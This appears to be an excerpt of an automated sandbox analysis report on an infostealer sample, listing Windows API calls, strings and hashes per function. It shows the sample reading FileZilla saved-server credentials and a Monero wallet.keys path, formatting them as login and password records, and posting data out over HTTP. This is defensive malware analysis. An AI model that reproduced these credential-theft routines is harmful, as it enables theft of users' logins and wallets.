Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

GetProcessHeap.KERNEL32(00000000,000F423F,00360DBA,00360DB7,00360DB6,00360DB3), ref: 00350362
RtlAllocateHeap.NTDLL(00000000), ref: 00350369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00350385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350393
StrStrA.SHLWAPI(00000000,<Port>), ref: 003503CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 003503DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00350419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00350463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00350562
lstrcat.KERNEL32(?,profile: null), ref: 00350571
lstrcat.KERNEL32(?,url: ), ref: 00350580
lstrcat.KERNEL32(?,00000000), ref: 00350593
lstrcat.KERNEL32(?,00361678), ref: 003505A2
lstrcat.KERNEL32(?,00000000), ref: 003505B5
lstrcat.KERNEL32(?,0036167C), ref: 003505C4
lstrcat.KERNEL32(?,login: ), ref: 003505D3
lstrcat.KERNEL32(?,00000000), ref: 003505E6
lstrcat.KERNEL32(?,00361688), ref: 003505F5
lstrcat.KERNEL32(?,password: ), ref: 00350604
lstrcat.KERNEL32(?,00000000), ref: 00350617
lstrcat.KERNEL32(?,00361698), ref: 00350626
lstrcat.KERNEL32(?,0036169C), ref: 00350635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035068E

Strings

profile: null, xrefs: 00350568
url: , xrefs: 00350577
browser: FileZilla, xrefs: 00350559
<Pass encoding="base64">, xrefs: 0035045A
<Port>, xrefs: 003503C6
password: , xrefs: 003505FB
<User>, xrefs: 00350410
<Host>, xrefs: 0035037C
login: , xrefs: 003505CA
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 003502A4

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 3ad1a1baaa8956e967c88a91aacbb57531ee177f66c329c817cc117293354d70
Instruction ID: d997be7d70cbc187cef054226b94f484e7990c77e6c35ec6269e416e4c937349
Opcode Fuzzy Hash: 3ad1a1baaa8956e967c88a91aacbb57531ee177f66c329c817cc117293354d70
Instruction Fuzzy Hash: 2AD131719002089BDB06EBE0DD96DEE7778FF14301F448519F902BA0A5EF74AA0DEB61

Function 00345100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

lstrlen.KERNEL32(00000000), ref: 00345193

Part of subcall function 00358EA0: CryptBinaryToStringA.CRYPT32(00000000,00345184,40000001,00000000,00000000,?,00345184), ref: 00358EC0

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00345207
StrCmpCA.SHLWAPI(?,0127E768), ref: 00345225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345340
HttpOpenRequestA.WININET(00000000,0127E7D8,?,0127DFF8,00000000,00000000,00400100,00000000), ref: 003453A4

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0127E878,00000000,?,0127A2B0,00000000,?,003619DC,00000000,?,003551CF), ref: 00345737
lstrlen.KERNEL32(00000000), ref: 0034574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0034575C
RtlAllocateHeap.NTDLL(00000000), ref: 00345763
lstrlen.KERNEL32(00000000), ref: 00345778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003457A9
lstrlen.KERNEL32(00000000), ref: 003457C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003457E1
lstrlen.KERNEL32(00000000,?,?), ref: 0034580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00345822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0034584D
InternetCloseHandle.WININET(00000000), ref: 003458B1
InternetCloseHandle.WININET(00000000), ref: 003458BE
InternetCloseHandle.WININET(00000000), ref: 003458C8

Strings

", xrefs: 00345482
------, xrefs: 0034563B
--, xrefs: 00345280
", xrefs: 00345706
------, xrefs: 003453B7
------, xrefs: 00345297
", xrefs: 003455C4
------, xrefs: 003454F9

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: f4b859f3d1262364c17a202a9fe3ffc053a876e571444de301282f8afd895925
Instruction ID: e1600753e6239a92e01d8253e864d1c64a1efdd7252c4a4119af13511bf26e66
Opcode Fuzzy Hash: f4b859f3d1262364c17a202a9fe3ffc053a876e571444de301282f8afd895925
Instruction Fuzzy Hash: E1324471920518ABDB16EBA0DC91FEE7778BF14701F404259F9067A0A2EF302A4DEF51

Function 0034A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035AA70: StrCmpCA.SHLWAPI(01278F80,0034A7A7,?,0034A7A7,01278F80), ref: 0035AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0034AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0034ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034A8B0

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

lstrcat.KERNEL32(?,00000000), ref: 0034ACEB
lstrcat.KERNEL32(?,00361320), ref: 0034ACFA
lstrcat.KERNEL32(?,00000000), ref: 0034AD0D
lstrcat.KERNEL32(?,00361324), ref: 0034AD1C
lstrcat.KERNEL32(?,00000000), ref: 0034AD2F
lstrcat.KERNEL32(?,00361328), ref: 0034AD3E
lstrcat.KERNEL32(?,00000000), ref: 0034AD51
lstrcat.KERNEL32(?,0036132C), ref: 0034AD60
lstrcat.KERNEL32(?,00000000), ref: 0034AD73
lstrcat.KERNEL32(?,00361330), ref: 0034AD82
lstrcat.KERNEL32(?,00000000), ref: 0034AD95
lstrcat.KERNEL32(?,00361334), ref: 0034ADA4
lstrcat.KERNEL32(?,00000000), ref: 0034ADB7
lstrlen.KERNEL32(?), ref: 0034AE0D
lstrlen.KERNEL32(?), ref: 0034AE1C

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

DeleteFileA.KERNEL32(00000000), ref: 0034AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0034ABD4

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: e3ae894fa44dcaf1f5f02a7cc8cc14750773bc288d2680c4a46bb17adbe5f9fc
Instruction ID: 0d5db549415b13d9a57361d895bb9cd5bcb3a2eb19cc3fb00e996268a7013676
Opcode Fuzzy Hash: e3ae894fa44dcaf1f5f02a7cc8cc14750773bc288d2680c4a46bb17adbe5f9fc
Instruction Fuzzy Hash: FA1202719105089BDB06EBA0DD96DEE7778BF14302F504259F907BA0A1EF346E0DEB62

Function 00345960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003459F8
StrCmpCA.SHLWAPI(?,0127E768), ref: 00345A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0127E818,00000000,?,0127A2B0,00000000,?,00361A1C), ref: 00345E71
lstrlen.KERNEL32(00000000), ref: 00345E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00345E93
RtlAllocateHeap.NTDLL(00000000), ref: 00345E9A
lstrlen.KERNEL32(00000000), ref: 00345EAF
lstrlen.KERNEL32(00000000), ref: 00345ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00345EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00345F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00345F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00345F4C
InternetCloseHandle.WININET(00000000), ref: 00345FB0
InternetCloseHandle.WININET(00000000), ref: 00345FBD
HttpOpenRequestA.WININET(00000000,0127E7D8,?,0127DFF8,00000000,00000000,00400100,00000000), ref: 00345BF8

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

InternetCloseHandle.WININET(00000000), ref: 00345FC7

Strings

", xrefs: 00345CD5
------, xrefs: 00345A96
", xrefs: 00345E16
------, xrefs: 00345C0B
------, xrefs: 00345D4C

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 63815d25f0b9e7136e27d382a7844c6e4c271c5783eda85c0282891a3fba61fe
Instruction ID: b07b1f13b46d0ae598d61572f70002a52ef668b028f3cd5fb0125ed9451f6651
Opcode Fuzzy Hash: 63815d25f0b9e7136e27d382a7844c6e4c271c5783eda85c0282891a3fba61fe
Instruction Fuzzy Hash: C6122371820518ABDB16EBA0DC95FEE7778BF14701F404259F9067A0A1EF702A4DEF61

Function 0034CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0127A730,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01279050,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0034D0CE
lstrcat.KERNEL32(?,00000000), ref: 0034D208
lstrcat.KERNEL32(?,00361478), ref: 0034D217
lstrcat.KERNEL32(?,00000000), ref: 0034D22A
lstrcat.KERNEL32(?,0036147C), ref: 0034D239
lstrcat.KERNEL32(?,00000000), ref: 0034D24C
lstrcat.KERNEL32(?,00361480), ref: 0034D25B
lstrcat.KERNEL32(?,00000000), ref: 0034D26E
lstrcat.KERNEL32(?,00361484), ref: 0034D27D
lstrcat.KERNEL32(?,00000000), ref: 0034D290
lstrcat.KERNEL32(?,00361488), ref: 0034D29F
lstrcat.KERNEL32(?,00000000), ref: 0034D2B2
lstrcat.KERNEL32(?,0036148C), ref: 0034D2C1
lstrcat.KERNEL32(?,00000000), ref: 0034D2D4
lstrcat.KERNEL32(?,00361490), ref: 0034D2E3

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

lstrlen.KERNEL32(?), ref: 0034D32A
lstrlen.KERNEL32(?), ref: 0034D339

Part of subcall function 0035AA70: StrCmpCA.SHLWAPI(01278F80,0034A7A7,?,0034A7A7,01278F80), ref: 0035AA8F

DeleteFileA.KERNEL32(00000000), ref: 0034D3B4

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
